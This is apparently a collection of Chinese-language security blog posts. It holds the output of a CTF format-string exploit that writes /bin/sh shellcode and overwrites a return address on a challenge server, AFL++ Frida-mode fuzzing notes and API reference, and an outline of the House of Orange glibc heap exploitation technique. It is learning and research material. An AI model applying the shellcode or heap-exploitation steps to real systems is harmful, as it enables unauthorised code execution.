[*] write_int8: 0xffb20004 0x31
[*] write_int8: 0xffb20005 0xc9
[*] write_int8: 0xffb20006 0xf7
[*] write_int8: 0xffb20007 0xe1
[*] write_int8: 0xffb20008 0x50
[*] write_int8: 0xffb20009 0xb0
[*] write_int8: 0xffb2000a 0xb
[*] write_int8: 0xffb2000b 0x68
[*] write_int8: 0xffb2000c 0x2f
[*] write_int8: 0xffb2000d 0x2f
[*] write_int8: 0xffb2000e 0x73
[*] write_int8: 0xffb2000f 0x68
[*] write_int8: 0xffb20010 0x68
[*] write_int8: 0xffb20011 0x2f
[*] write_int8: 0xffb20012 0x62
[*] write_int8: 0xffb20013 0x69
[*] write_int8: 0xffb20014 0x6e
[*] write_int8: 0xffb20015 0x89
[*] write_int8: 0xffb20016 0xe3
[*] write_int8: 0xffb20017 0xcd
[*] write_int8: 0xffb20018 0x80
[*] ret_addr -> 0xffb2d43c
[*] shell_addr -> 0xffb20004
[*] write_int8: 0xffb2d43c 0x4
[*] write_int8: 0xffb2d43d 0x0
[*] write_int8: 0xffb2d43e 0xb2
[*] write_int8: 0xffb2d43f 0xff
[*] flag: b'flag{▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇}\n'
[*] Closed connection to node4.buuoj.cn port 28106

The Challenge

https://buuoj.cn/challenges#hitcontraining_playfmt

AFL++ Frida-Mode: Usecases for testing and debugging

2022-04-07T14:48:39.000Z

Fuzzing

明确指明需要加载的AFL_PRELOAD=环境变量值为/usr/local/lib/afl/afl-frida-trace.so、且需要加载的harness javascript文件为afl.js时:

1	AFL_PRELOAD=/usr/local/lib/afl/afl-frida-trace.so AFL_FRIDA_JS_SCRIPT=fuzz.js afl-fuzz -D -O -i in -o out -t 10000+ -- ./build/test ./build/dummy

由于afl-frida-trace.so在PATH中，且AFL++ Frida_Mode默认寻找二进制同目录下的afl.js加载。因此以上可简写为：

1	afl-fuzz -D -O -i in -o out -t 10000+ -- ./build/test ./build/dummy

(注意有时在persistent时，有时用dummy input作为输入文件。以防止初始运行时找不到out/default/.cur_input文件而报错)

当需要输出forkserver的子进程的以便调试时：

1	AFL_CHILD_DEBUG=1 afl-fuzz -O -D -i in -o out -- ./build/testinstr @@

GDB Debugging

命令如下：

Example 1: 开启AFL_DEBUG_CHILD

gdb \
    --ex 'set environment LD_PRELOAD=/usr/local/lib/afl/afl-frida-trace.so' \
    --ex 'set environment AFL_FRIDA_JS_SCRIPT=afl.js' \
    --ex 'set environment AFL_DEBUG_CHILD=1' \
    --ex 'set disassembly-flavor intel' \
    --args ./build/testinstr ./build/in/in

Example 2:

gdb \
    --ex 'set environment LD_PRELOAD=/usr/local/lib/afl/afl-frida-trace.so' \
    --ex 'set environment AFL_FRIDA_JS_SCRIPT=afl.js' \
    --ex 'set disassembly-flavor intel' \
    --args ./build/testinstr ./build/in/in

Scripting

一个简单且方便调试的harnessjs 脚本如下

Afl.print("----------------------------------------");
Afl.print("|             4x7 = 28                 |");
Afl.print("----------------------------------------");

Afl.print("pid: " + Process.id);
const name = Process.enumerateModules()[0].name;
Afl.print(`Name: ${name}`);

new ModuleMap().values().forEach(m => {
    Afl.print(`${m.base}-${m.base.add(m.size)} ${m.name}`);
});


//address of testinstr
// var testinstr_addr = Module.findExportByName(null, "testinstr");
// var testinstr_addr = DebugSymbol.forName("testinstr").address;
const module = Process.enumerateModules()[0];
Afl.print("Module.base: " + module.base);
const testinstr_addr = module.base.add(0x8ca);
Afl.print("testinstr_addr: " + testinstr_addr);

const cm = new CModule(`
    extern unsigned char * __afl_fuzz_ptr;
    extern unsigned int * __afl_fuzz_len;
    extern void testinstr(char *buf, int len);
    void fuzz(char *buf, int len) {
        __afl_fuzz_ptr[*__afl_fuzz_len] = 0;
        testinstr(__afl_fuzz_ptr, *__afl_fuzz_len);
    }
`, {
    testinstr: testinstr_addr,
    __afl_fuzz_ptr: Afl.getAflFuzzPtr(),
    __afl_fuzz_len: Afl.getAflFuzzLen()
});

Afl.setEntryPoint(cm.fuzz);
Afl.setPersistentAddress(cm.fuzz);
Afl.setInMemoryFuzzing();
Afl.setJsMainHook(cm.fuzz);
Afl.print("done");
Afl.done();

AFL++ Frida-Mode Scripting

2022-04-05T07:56:35.000Z

Scripting

FRIDA当前支持使用Javascript配置的能力。依靠FRIDA的脚本引擎（支持调试符号和导出表），这比之前使用环境变量配置FRIDA更加方便。

在默认情况下，FRIDA模式会在目标文件(要被fuzz的二进制文件)相同目录下寻找afl.js文件，作为FRIDA的配置文件。若为其他文件名，则可使用AFL_FRIDA_JS_SCRIPT环境变量指定。

在该脚本中，除所有标准的frida api函数外，还另外添加了一些功能函数用以与FRIDA mode自身交互。这些额外的函数可以通过全局变量Afl来访问，例如 Afl.print("Hello world"); 取代 console.log("Hello World");

在使用中若需要调试，则使用环境变量AFL_DEBUG_CHILD=1.

Example

在有符号的二进制中，用户往往更喜欢用符号指定函数地址（例如入口函数或者persistent fuzz的地址）。

下面的例子使用了API
DebugSymbol.fromName().
和
Module.getExportByName().

/* Use Afl.print instead of console.log */
Afl.print('******************');
Afl.print('* AFL FRIDA MODE *');
Afl.print('******************');
Afl.print('');

/* Print some useful diagnostics stuff */
Afl.print(`PID: ${Process.id}`);

new ModuleMap().values().forEach(m => {
    Afl.print(`${m.base}-${m.base.add(m.size)} ${m.name}`);
});

/*
 * Configure entry-point, persistence etc. This will be what most
 * people want to do.
 */
const persistent_addr = DebugSymbol.fromName('main');
Afl.print(`persistent_addr: ${persistent_addr.address}`);

if (persistent_addr.address.equals(ptr(0))) {
    Afl.error('Cannot find symbol main');
}

const persistent_ret = DebugSymbol.fromName('slow');
Afl.print(`persistent_ret: ${persistent_ret.address}`);

if (persistent_ret.address.equals(ptr(0))) {
    Afl.error('Cannot find symbol slow');
}

Afl.setPersistentAddress(persistent_addr.address);
Afl.setPersistentReturn(persistent_ret.address);
Afl.setPersistentCount(1000000);

/* Control instrumentation, you may want to do this too */
Afl.setInstrumentLibraries();
const mod = Process.findModuleByName("libc-2.31.so")
Afl.addExcludedRange(mod.base, mod.size);

/* Some useful options to configure logging */
Afl.setStdOut("/tmp/stdout.txt");
Afl.setStdErr("/tmp/stderr.txt");

/* Show the address layout. Sometimes helpful */
Afl.setDebugMaps();

/*
 * If you are using these options, then things aren't going
 * very well for you.
 */
Afl.setInstrumentDebugFile("/tmp/instr.log");
Afl.setPrefetchDisable();
Afl.setInstrumentNoOptimize();
Afl.setInstrumentEnableTracing();
Afl.setInstrumentTracingUnique();
Afl.setStatsFile("/tmp/stats.txt");
Afl.setStatsInterval(1);

/* *ALWAYS* call this when you have finished all your configuration */
Afl.done();
Afl.print("done");

Stripped binaries

下面的例子是处理没符号或者导出表的二进制的情况：

const module = Process.getModuleByName('target.exe');
/* Hardcoded offset within the target image */
const address = module.base.add(0xdeadface);
Afl.setPersistentAddress(address);

Persistent hook

Persistent hook可以通过使用一个共享链接库的方式(***.so)的方式实现。示例源码（hook并fuzzLLVMFuzzerTestOneInput函数的例子）可以在Frida_mode/hook目录下找到。在该例子中，使用了如下的代码片段实现Persistent Hook。

const path = Afl.module.path;
const dir = path.substring(0, path.lastIndexOf("/"));
const mod = Module.load(`${dir}/frida_mode/build/hook.so`);
const hook = mod.getExportByName('afl_persistent_hook');
Afl.setPersistentHook(hook);

Persistent Hook也可以通过FRIDA本身对CModule的支持来实现，该功能依赖于TinyCC。

const cm = new CModule(`

    #include 
    #include 

    void afl_persistent_hook(GumCpuContext *regs, uint8_t *input_buf,
      uint32_t input_buf_len) {

      memcpy((void *)regs->rdi, input_buf, input_buf_len);
      regs->rsi = input_buf_len;

    }
    `,
    {
        memcpy: Module.getExportByName(null, 'memcpy')
    });
Afl.setPersistentHook(cm.afl_persistent_hook);

Advanced persistence

以如下的代码作为（被fuzz）的目标程序源码为例：


#include 
#include 
#include 
#include 
#include 

void LLVMFuzzerTestOneInput(char *buf, int len) {

  if (len < 1) return;
  buf[len] = 0;

  // we support three input cases
  if (buf[0] == '0')
    printf("Looks like a zero to me!\n");
  else if (buf[0] == '1')
    printf("Pretty sure that is a one!\n");
  else
    printf("Neither one or zero? How quaint!\n");

}

int run(char *file) {

  int    fd = -1;
  off_t  len;
  char * buf = NULL;
  size_t n_read;
  int    result = -1;

  do {

    dprintf(STDERR_FILENO, "Running: %s\n", file);

    fd = open(file, O_RDONLY);
    if (fd < 0) {

      perror("open");
      break;

    }

    len = lseek(fd, 0, SEEK_END);
    if (len < 0) {

      perror("lseek (SEEK_END)");
      break;

    }

    if (lseek(fd, 0, SEEK_SET) != 0) {

      perror("lseek (SEEK_SET)");
      break;

    }

    buf = malloc(len);
    if (buf == NULL) {

      perror("malloc");
      break;

    }

    n_read = read(fd, buf, len);
    if (n_read != len) {

      perror("read");
      break;

    }

    dprintf(STDERR_FILENO, "Running:    %s: (%zd bytes)\n", file, n_read);

    LLVMFuzzerTestOneInput(buf, len);
    dprintf(STDERR_FILENO, "Done:    %s: (%zd bytes)\n", file, n_read);

    result = 0;

  } while (false);

  if (buf != NULL) { free(buf); }

  if (fd != -1) { close(fd); }

  return result;

}

void slow() {

  usleep(100000);

}

int main(int argc, char **argv) {

  if (argc != 2) { return 1; }
  slow();
  return run(argv[1]);

}

使用CModule的实现方法，FRIDA模式支持对任何函数的替换。如下例：

const slow = DebugSymbol.fromName('slow').address;
Afl.print(`slow: ${slow}`);

const LLVMFuzzerTestOneInput = DebugSymbol.fromName('LLVMFuzzerTestOneInput').address;
Afl.print(`LLVMFuzzerTestOneInput: ${LLVMFuzzerTestOneInput}`);

const cm = new CModule(`

    extern unsigned char * __afl_fuzz_ptr;
    extern unsigned int * __afl_fuzz_len;
    extern void LLVMFuzzerTestOneInput(char *buf, int len);

    void slow(void) {

      LLVMFuzzerTestOneInput(__afl_fuzz_ptr, *__afl_fuzz_len);
    }
    `,
    {
        LLVMFuzzerTestOneInput: LLVMFuzzerTestOneInput,
        __afl_fuzz_ptr: Afl.getAflFuzzPtr(),
        __afl_fuzz_len: Afl.getAflFuzzLen()
    });

Afl.setEntryPoint(cm.slow);
Afl.setPersistentAddress(cm.slow);
Afl.setInMemoryFuzzing();
Interceptor.replace(slow, cm.slow);
Afl.print("done");
Afl.done();

在这个例子里，我们将slow函数替换成我们自己的代码。该代码随后被设定为入口地址、及persistent循环的地址。

Replacing LLVMFuzzerTestOneInput

与其他函数类似，函数LLVMFuzzerTestOneInput同样可以被替换。另外，任何被替换的函数都可以调用它本身。在下面的例子中，我们将LLVMFuzzerTestOneInput函数替换成My_LLVMFuzzerTestOneInput函数，并忽视buf和len两个参数；而改为使用__afl_fuzzer_ptr和__afl_fuzz_len。这允许我们在不必hook其他函数的情况下使用in-memory fuzzing。需要注意的是：替换函数和被替换的原函数不能使用同一函数名字，否则在CModule中的C代码将会由于符号名冲突而不能编译。

const LLVMFuzzerTestOneInput = DebugSymbol.fromName('LLVMFuzzerTestOneInput').address;
Afl.print(`LLVMFuzzerTestOneInput: ${LLVMFuzzerTestOneInput}`);

const cm = new CModule(`

    extern unsigned char * __afl_fuzz_ptr;
    extern unsigned int * __afl_fuzz_len;
    extern void LLVMFuzzerTestOneInput(char *buf, int len);

    void My_LLVMFuzzerTestOneInput(char *buf, int len) {

      LLVMFuzzerTestOneInput(__afl_fuzz_ptr, *__afl_fuzz_len);

    }
    `,
    {
        LLVMFuzzerTestOneInput: LLVMFuzzerTestOneInput,
        __afl_fuzz_ptr: Afl.getAflFuzzPtr(),
        __afl_fuzz_len: Afl.getAflFuzzLen()
    });

Afl.setEntryPoint(cm.My_LLVMFuzzerTestOneInput);
Afl.setPersistentAddress(cm.My_LLVMFuzzerTestOneInput);
Afl.setInMemoryFuzzing();
Interceptor.replace(LLVMFuzzerTestOneInput, cm.My_LLVMFuzzerTestOneInput);

Hooking `main`

最后，需要注意的是，main函数的Hook是一个特殊情况，这是因为main函数已经被FRIDA引擎自身hook了（至少第一个基本块已经被Stalker编译了）。因此任何如以上例子使用Interceptor.replace对main函数的替换都无效。JS绑定为此提供了setJsMainHook如下例所示：

const main = DebugSymbol.fromName('main').address;
Afl.print(`main: ${main}`);

const LLVMFuzzerTestOneInput = DebugSymbol.fromName('LLVMFuzzerTestOneInput').address;
Afl.print(`LLVMFuzzerTestOneInput: ${LLVMFuzzerTestOneInput}`);

const cm = new CModule(`

    extern unsigned char * __afl_fuzz_ptr;
    extern unsigned int * __afl_fuzz_len;
    extern void LLVMFuzzerTestOneInput(char *buf, int len);

    int main(int argc, char **argv)  {

      LLVMFuzzerTestOneInput(__afl_fuzz_ptr, *__afl_fuzz_len);

    }
    `,
    {
        LLVMFuzzerTestOneInput: LLVMFuzzerTestOneInput,
        __afl_fuzz_ptr: Afl.getAflFuzzPtr(),
        __afl_fuzz_len: Afl.getAflFuzzLen()
    });

Afl.setEntryPoint(cm.main);
Afl.setPersistentAddress(cm.main);
Afl.setInMemoryFuzzing();
Afl.setJsMainHook(cm.main);

Library Fuzzing

使用FRIDA的Module.loadAPI,可扩展上述例子main函数的能力，使之调用任意函数。从而，当我们需要Fuzz一个动态链接库（而非可执行程序）时，可使用一个代理可执行程序作为入口。

Patching

以如下测试代码为例：

/*
   american fuzzy lop++ - a trivial program to test the build
   --------------------------------------------------------
   Originally written by Michal Zalewski
   Copyright 2014 Google Inc. All rights reserved.
   Copyright 2019-2022 AFLplusplus Project. All rights reserved.
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at:
     https://www.apache.org/licenses/LICENSE-2.0
 */

#include 
#include 
#include 
#include 
#include 
#include 

const uint32_t crc32_tab[] = {
    0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f,

  ...

    0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d
};

uint32_t
crc32(const void *buf, size_t size)
{
    const uint8_t *p = buf;
    uint32_t crc;
    crc = ~0U;
    while (size--)
        crc = crc32_tab[(crc ^ *p++) & 0xFF] ^ (crc >> 8);
    return crc ^ ~0U;
}

/*
 * Don't you hate those contrived examples which CRC their data. We can use
 * FRIDA to patch this function out and always return success. Otherwise, we
 * could change it to actually correct the checksum.
 */
int crc32_check (char * buf, int len) {
  if (len < sizeof(uint32_t)) { return 0; }
  uint32_t expected = *(uint32_t *)&buf[len - sizeof(uint32_t)];
  uint32_t calculated = crc32(buf, len - sizeof(uint32_t));
  return expected == calculated;
}

/*
 * So you've found a really boring bug in an earlier campaign which results in
 * a NULL dereference or something like that. That bug can get in the way,
 * causing the persistent loop to exit whenever it is triggered, and can also
 * cloud your output unnecessarily. Again, we can use FRIDA to patch it out.
 */
void some_boring_bug(char c) {
  switch (c) {
    case 'A'...'Z':
    case 'a'...'z':
      __builtin_trap();
      break;
  }
}

void LLVMFuzzerTestOneInput(char *buf, int len) {

  if (!crc32_check(buf, len)) return;

  some_boring_bug(buf[0]);

  if (buf[0] == '0') {
    printf("Looks like a zero to me!\n");
  }
  else if (buf[0] == '1') {
    printf("Pretty sure that is a one!\n");
  }
  else if (buf[0] == '2') {
    if (buf[1] == '3') {
      if (buf[2] == '4') {
        printf("Oh we, weren't expecting that!");
        __builtin_trap();
      }
    }
  }
  else
    printf("Neither one or zero? How quaint!\n");

}

int main(int argc, char **argv) {

  int    fd = -1;
  off_t  len;
  char * buf = NULL;
  size_t n_read;
  int    result = -1;

  if (argc != 2) { return 1; }

  printf("Running: %s\n", argv[1]);

  fd = open(argv[1], O_RDONLY);
  if (fd < 0) { return 1; }

  len = lseek(fd, 0, SEEK_END);
  if (len < 0) { return 1; }

  if (lseek(fd, 0, SEEK_SET) != 0) { return 1; }

  buf = malloc(len);
  if (buf == NULL) { return 1; }

  n_read = read(fd, buf, len);
  if (n_read != len) { return 1; }

  printf("Running:    %s: (%zd bytes)\n", argv[1], n_read);

  LLVMFuzzerTestOneInput(buf, len);
  printf("Done:    %s: (%zd bytes)\n", argv[1], n_read);

  return 0;
}

在以上的测试代码中，有多个函数会成为Fuzz的障碍，在如下的例子中，我们示范如何使用FRIDA的功能修改掉这些障碍。

Afl.print('******************');
Afl.print('* AFL FRIDA MODE *');
Afl.print('******************');
Afl.print('');

const main = DebugSymbol.fromName('main').address;
Afl.print(`main: ${main}`);
Afl.setEntryPoint(main);
Afl.setPersistentAddress(main);
Afl.setPersistentCount(10000000);

const crc32_check = DebugSymbol.fromName('crc32_check').address;
const crc32_replacement = new NativeCallback(
    (buf, len) => {
        Afl.print(`len: ${len}`);
        if (len < 4) {
            return 0;
        }

        return 1;
    },
    'int',
    ['pointer', 'int']);
Interceptor.replace(crc32_check, crc32_replacement);

const some_boring_bug = DebugSymbol.fromName('some_boring_bug').address
const boring_replacement = new NativeCallback(
    (c) => { },
    'void',
    ['char']);
Interceptor.replace(some_boring_bug, boring_replacement);

Afl.done();
Afl.print("done");

Advanced patching

Consider the following code fragment…

extern void some_boring_bug2(char c);

__asm__ (
      ".text                                 \n"
      "some_boring_bug2:                     \n"
      ".global some_boring_bug2              \n"
      ".type some_boring_bug2, @function     \n"
      "mov %edi, %eax                        \n"
      "cmp $0xb4, %al                        \n"
      "jne ok                                \n"
      "ud2                                   \n"
      "ok:                                   \n"
      "ret                                   \n");

void LLVMFuzzerTestOneInput(char *buf, int len) {

  ...

  some_boring_bug2(buf[0]);

  ...

}

FRIDA除Interceptor.replace和Interceptor.attachAPI之外，还允许使用StalkerAPI对目标程序进行更细粒度的更改。

如下的例子将目标函数中的UD2指令修改为nop指令，从而避免崩溃（UD2指令为崩溃指令）。

/* Modify the instructions */
const some_boring_bug2 = DebugSymbol.fromName('some_boring_bug2').address
const pid = Memory.alloc(4);
pid.writeInt(Process.id);

const cm = new CModule(`
    #include 
    #include 

    typedef int pid_t;

    #define STDERR_FILENO 2
    #define BORING2_LEN 10

    extern int dprintf(int fd, const char *format, ...);
    extern void some_boring_bug2(char c);
    extern pid_t getpid(void);
    extern pid_t pid;

    gboolean js_stalker_callback(const cs_insn *insn, gboolean begin,
        gboolean excluded, GumStalkerOutput *output)
    {
        pid_t my_pid = getpid();
        GumX86Writer *cw = output->writer.x86;

        if (GUM_ADDRESS(insn->address) < GUM_ADDRESS(some_boring_bug2)) {

            return TRUE;

        }

        if (GUM_ADDRESS(insn->address) >=
            GUM_ADDRESS(some_boring_bug2) + BORING2_LEN) {

            return TRUE;

        }

        if (my_pid == pid) {

            if (begin) {

                dprintf(STDERR_FILENO, "\n> 0x%016lX: %s %s\n", insn->address,
                        insn->mnemonic, insn->op_str);

            } else {

                dprintf(STDERR_FILENO, "  0x%016lX: %s %s\n", insn->address,
                        insn->mnemonic, insn->op_str);

            }

        }

        if (insn->id == X86_INS_UD2) {

            gum_x86_writer_put_nop(cw);
            return FALSE;

        } else {

            return TRUE;

        }
    }
    `,
    {
        dprintf: Module.getExportByName(null, 'dprintf'),
        getpid: Module.getExportByName(null, 'getpid'),
        some_boring_bug2: some_boring_bug2,
        pid: pid
    });
Afl.setStalkerCallback(cm.js_stalker_callback)
Afl.setStdErr("/tmp/stderr.txt");

注意你可能更喜欢用如下的代码找到patch地址。

1
2
3

const module = Process.getModuleByName('target.exe');
/* Hardcoded offset within the target image */
const address = module.base.add(0xdeadface);

1	const address = DebugSymbol.fromName("my_function").address.add(0xdeadface);

1	const address = Module.getExportByName(null, "my_function").add(0xdeadface);

若原函数的原始指令没有更更改，则函数js_stalker_callback应该返回TRUE,否则返回FALSE。在上述的例子中，我们可以看到原始指令被替换成NOP指令。

最后注意：应保持forkserver父子进程的代码相同或forkserver每次产生的子进程代码相同，否则会产生难以调试的bug【原文：
note that the same callback will be called when compiling instrumented
code both in the child of the forkserver (as it is executed) and also in the
parent of the forkserver (when prefetching is enabled) so that it can be
inherited by the next forked child. It is VERY important that the same
instructions be generated in both the parent and the child or if prefetching is
disabled that the same instructions are generated every time the block is
compiled. Failure to do so will likely lead to bugs which are incredibly
difficult to diagnose. The code above only prints the instructions when running
in the parent process (the one provided by Process.id when the JS script is
executed).】

OSX

注意OSX上JavaScript的调试符号api使用CoreSymbolicationAPI，因此目标进程需要加载和使用CoreFoundation模块，如下设定：

1	AFL_PRELOAD=/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation

应该被注意的是CoreSymbolicationAPI在初始化和创建cache的时候较慢，因此，需要增加afl-fuzz的-t参数的值，避免超时。

API

class Afl {
  /**
   * This is equivalent to setting a value in `AFL_FRIDA_EXCLUDE_RANGES`,
   * it takes as arguments a `NativePointer` and a `number`. It can be
   * called multiple times to exclude several ranges.
   */
  static addExcludedRange(addressess, size) {
      Afl.jsApiAddExcludeRange(addressess, size);
  }
  /**
   * This is equivalent to setting a value in `AFL_FRIDA_INST_RANGES`,
   * it takes as arguments a `NativePointer` and a `number`. It can be
   * called multiple times to include several ranges.
   */
  static addIncludedRange(addressess, size) {
      Afl.jsApiAddIncludeRange(addressess, size);
  }
  /**
   * This must always be called at the end of your script. This lets
   * FRIDA mode know that your configuration is finished and that
   * execution has reached the end of your script. Failure to call
   * this will result in a fatal error.
   */
  static done() {
      Afl.jsApiDone();
  }
  /**
   * This function can be called within your script to cause FRIDA
   * mode to trigger a fatal error. This is useful if for example you
   * discover a problem you weren't expecting and want everything to
   * stop. The user will need to enable `AFL_DEBUG_CHILD=1` to view
   * this error message.
   */
  static error(msg) {
      const buf = Memory.allocUtf8String(msg);
      Afl.jsApiError(buf);
  }
  /**
   * Function used to provide access to `__afl_fuzz_ptr`, which contains the length of
   * fuzzing data when using in-memory test case fuzzing.
   */
  static getAflFuzzLen() {
      return Afl.jsApiGetSymbol("__afl_fuzz_len");
  }
  /**
   * Function used to provide access to `__afl_fuzz_ptr`, which contains the fuzzing
   * data when using in-memory test case fuzzing.
   */
  static getAflFuzzPtr() {
      return Afl.jsApiGetSymbol("__afl_fuzz_ptr");
  }
  /**
   * Print a message to the STDOUT. This should be preferred to
   * FRIDA's `console.log` since FRIDA will queue it's log messages.
   * If `console.log` is used in a callback in particular, then there
   * may no longer be a thread running to service this queue.
   */
  static print(msg) {
      const STDOUT_FILENO = 2;
      const log = `${msg}\n`;
      const buf = Memory.allocUtf8String(log);
      Afl.jsApiWrite(STDOUT_FILENO, buf, log.length);
  }
  /**
   * See `AFL_FRIDA_STALKER_NO_BACKPATCH`.
   */
  static setBackpatchDisable() {
      Afl.jsApiSetBackpatchDisable();
  }
  /**
   * See `AFL_FRIDA_DEBUG_MAPS`.
   */
  static setDebugMaps() {
      Afl.jsApiSetDebugMaps();
  }
  /**
   * This has the same effect as setting `AFL_ENTRYPOINT`, but has the
   * convenience of allowing you to use FRIDAs APIs to determine the
   * address you would like to configure, rather than having to grep
   * the output of `readelf` or something similarly ugly. This
   * function should be called with a `NativePointer` as its
   * argument.
   */
  static setEntryPoint(address) {
      Afl.jsApiSetEntryPoint(address);
  }
  /**
   * Function used to enable in-memory test cases for fuzzing.
   */
  static setInMemoryFuzzing() {
      Afl.jsApiAflSharedMemFuzzing.writeInt(1);
  }
  /**
   * See `AFL_FRIDA_INST_COVERAGE_FILE`. This function takes a single `string`
   * as an argument.
   */
  static setInstrumentCoverageFile(file) {
      const buf = Memory.allocUtf8String(file);
      Afl.jsApiSetInstrumentCoverageFile(buf);
  }
  /**
   * See `AFL_FRIDA_INST_DEBUG_FILE`. This function takes a single `string` as
   * an argument.
   */
  static setInstrumentDebugFile(file) {
      const buf = Memory.allocUtf8String(file);
      Afl.jsApiSetInstrumentDebugFile(buf);
  }
  /**
   * See `AFL_FRIDA_INST_TRACE`.
   */
  static setInstrumentEnableTracing() {
      Afl.jsApiSetInstrumentTrace();
  }
  /**
   * See `AFL_FRIDA_INST_JIT`.
   */
  static setInstrumentJit() {
      Afl.jsApiSetInstrumentJit();
  }
  /**
   * See `AFL_INST_LIBS`.
   */
  static setInstrumentLibraries() {
      Afl.jsApiSetInstrumentLibraries();
  }
  /**
   * See `AFL_FRIDA_INST_NO_OPTIMIZE`
   */
  static setInstrumentNoOptimize() {
      Afl.jsApiSetInstrumentNoOptimize();
  }
  /*
    * See `AFL_FRIDA_INST_SEED`
    */
  static setInstrumentSeed(seed) {
      Afl.jsApiSetInstrumentSeed(seed);
  }
  /**
   * See `AFL_FRIDA_INST_TRACE_UNIQUE`.
   */
  static setInstrumentTracingUnique() {
      Afl.jsApiSetInstrumentTraceUnique();
  }
  /**
   * See `AFL_FRIDA_INST_UNSTABLE_COVERAGE_FILE`. This function takes a single
   * `string` as an argument.
   */
  static setInstrumentUnstableCoverageFile(file) {
      const buf = Memory.allocUtf8String(file);
      Afl.jsApiSetInstrumentUnstableCoverageFile(buf);
  }
  /*
    * Set a callback to be called in place of the usual `main` function. This see
    * `Scripting.md` for details.
    */
  static setJsMainHook(address) {
      Afl.jsApiSetJsMainHook(address);
  }
  /**
   * This is equivalent to setting `AFL_FRIDA_PERSISTENT_ADDR`, again a
   * `NativePointer` should be provided as it's argument.
   */
  static setPersistentAddress(address) {
      Afl.jsApiSetPersistentAddress(address);
  }
  /**
   * This is equivalent to setting `AFL_FRIDA_PERSISTENT_CNT`, a
   * `number` should be provided as it's argument.
   */
  static setPersistentCount(count) {
      Afl.jsApiSetPersistentCount(count);
  }
  /**
   * See `AFL_FRIDA_PERSISTENT_DEBUG`.
   */
  static setPersistentDebug() {
      Afl.jsApiSetPersistentDebug();
  }
  /**
   * See `AFL_FRIDA_PERSISTENT_ADDR`. This function takes a NativePointer as an
   * argument. See above for examples of use.
   */
  static setPersistentHook(address) {
      Afl.jsApiSetPersistentHook(address);
  }
  /**
   * This is equivalent to setting `AFL_FRIDA_PERSISTENT_RET`, again a
   * `NativePointer` should be provided as it's argument.
   */
  static setPersistentReturn(address) {
      Afl.jsApiSetPersistentReturn(address);
  }
  /**
   * See `AFL_FRIDA_INST_NO_PREFETCH_BACKPATCH`.
   */
  static setPrefetchBackpatchDisable() {
      Afl.jsApiSetPrefetchBackpatchDisable();
  }
  /**
   * See `AFL_FRIDA_INST_NO_PREFETCH`.
   */
  static setPrefetchDisable() {
      Afl.jsApiSetPrefetchDisable();
  }
  /**
   * See `AFL_FRIDA_SECCOMP_FILE`. This function takes a single `string` as
   * an argument.
   */
  static setSeccompFile(file) {
      const buf = Memory.allocUtf8String(file);
      Afl.jsApiSetSeccompFile(buf);
  }
  /**
   * See `AFL_FRIDA_STALKER_ADJACENT_BLOCKS`.
   */
  static setStalkerAdjacentBlocks(val) {
      Afl.jsApiSetStalkerAdjacentBlocks(val);
  }
  /*
    * Set a function to be called for each instruction which is instrumented
    * by AFL FRIDA mode.
    */
  static setStalkerCallback(callback) {
      Afl.jsApiSetStalkerCallback(callback);
  }
  /**
   * See `AFL_FRIDA_STALKER_IC_ENTRIES`.
   */
  static setStalkerIcEntries(val) {
      Afl.jsApiSetStalkerIcEntries(val);
  }
  /**
   * See `AFL_FRIDA_STATS_FILE`. This function takes a single `string` as
   * an argument.
   */
  static setStatsFile(file) {
      const buf = Memory.allocUtf8String(file);
      Afl.jsApiSetStatsFile(buf);
  }
  /**
   * See `AFL_FRIDA_STATS_INTERVAL`. This function takes a `number` as an
   * argument
   */
  static setStatsInterval(interval) {
      Afl.jsApiSetStatsInterval(interval);
  }
  /**
   * See `AFL_FRIDA_OUTPUT_STDERR`. This function takes a single `string` as
   * an argument.
   */
  static setStdErr(file) {
      const buf = Memory.allocUtf8String(file);
      Afl.jsApiSetStdErr(buf);
  }
  /**
   * See `AFL_FRIDA_OUTPUT_STDOUT`. This function takes a single `string` as
   * an argument.
   */
  static setStdOut(file) {
      const buf = Memory.allocUtf8String(file);
      Afl.jsApiSetStdOut(buf);
  }
  /**
   * See `AFL_FRIDA_TRACEABLE`.
   */
  static setTraceable() {
      Afl.jsApiSetTraceable();
  }
  static jsApiGetFunction(name, retType, argTypes) {
      const addr = Afl.module.getExportByName(name);
      return new NativeFunction(addr, retType, argTypes);
  }
  static jsApiGetSymbol(name) {
      return Afl.module.getExportByName(name);
  }
}

HeapAttack: House_of_Orange

2022-03-25T07:02:22.000Z

漏洞样式

漏洞要求：libc-leak，任意地址写(_IO_list_all劫持), 大块chunk控制(伪造_IO_FILE结构)
libc版本：glibc-2.3及以下

2. 利用方法

2.1 攻击效果

GetShell：
通过劫持_IO_list_all.vtable中某函数指针，篡改为system或one_gadget, 并伪造_IO_FILE结构从而使程序在调用 _IO_flush_all_lockp 函数后能够最终调用到system或one_gadet。_IO_flush_all_lockp

2.2 过程简述

1. 使用unsortedbin attack，largebin attack，tcache dup、House Of Botcake等任意地址写技术将_IO_list_all改写为攻击者可控内存地址(记为fakeIOList)。
1. 在fakeIOList上布置内存布局，使得以类型Struct _IO_File 解析fakeIOList
- a. fp->_mode <= 0
- b. fp->_IO_write_ptr > fp->_IO_write_base
1. vtable 指向可控内存区域，修改 vtable->__overflow 为目标函数(system或者one_gadget)
1. [可选的]若vtable->__overflow指向system。可将fp->_flags 写成b"/bin/sh\0"。因为最终调用的代码是：
_IO_OVERFLOW (fp, EOF)
即
fp->vtable->__overflow(fp)

3. 注意

参考链接(IO FILE 之劫持vtable及FSOP)中的以下两个技巧的学习：

通过mmap 0x200000的超大chunk，该chunk会恰好分配在libc的上方，这样可以leak libc地址。
当top_chunk size不够分配内存时，main_arena会sbrk新的page；若旧top_chunk的末尾地址与sbrk新分配内存的开始地址不邻接，则会把旧top_chunk free掉。我们这样就不经过free获得了一个unsortedbin chunk。

参考

HeapAttack: LargeBin Attack

2022-03-23T13:16:30.000Z

1. 漏洞样式

漏洞要求：Write After Free
chunk大小：可申请 large bin(即size>=0x400)

2. 利用方法

2.1 攻击效果

